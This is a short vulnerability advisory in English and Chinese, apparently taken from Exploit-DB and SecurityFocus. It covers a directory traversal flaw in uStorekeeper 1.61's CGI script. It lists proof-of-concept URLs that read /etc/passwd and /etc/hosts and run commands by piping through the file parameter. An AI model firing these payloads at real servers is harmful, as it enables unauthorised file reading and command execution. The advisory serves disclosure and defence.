https://www.exploit-db.com/exploits/20725
https://www.securityfocus.com/bid/88984
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-107

ustorekeeper1.61版本存在目录遍历漏洞。远程攻击者可以借助file参数的..(点点)读取任意文件。

source: http://www.securityfocus.com/bid/2536/info

A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies.

The script fails to properly validate user-supplied input, allowing remote users to submit URLs containing '/../' sequences and arbitrary filenames or commands, which will be executed or displayed with the privilege level of the webserver user.

This permits the remote user to request files and execute commands from arbitrary locations on the host filesystem, outside the script's normal directory scope.

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd

http://www.example .com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../.
./../../../../bin/cat%20ustorekeeper.pl|

Microburst uStorekeeper Online Shopping System 1.61

来源:BUGTRAQ
名称:20010403newadvisory
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=98633176230748&w;=2